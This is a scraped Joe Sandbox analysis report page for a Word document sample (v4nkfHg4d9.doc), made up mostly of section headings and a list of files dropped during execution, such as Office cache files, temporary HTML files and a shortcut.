PCAP (Network Traffic)

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{54DDC164-6977-4037-8CE0-7B33C8A8D8B0}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{1657AA85-2CA3-4A47-A452-C920236DEB83}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a[1].html

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81D0D9EE.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html

C:\Users\user\AppData\Local\Temp\{D27243F2-B974-4680-97D9-017679567B8A}

C:\Users\user\AppData\Local\Temp\{E560C265-B8FC-4A02-872E-FF7D04240D0D}

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\v4nkfHg4d9.LNK

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$nkfHg4d9.doc

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/706117/sample/v4nkfHg4d9.doc"

Indicators

Summary

Windows Analysis Report
v4nkfHg4d9.doc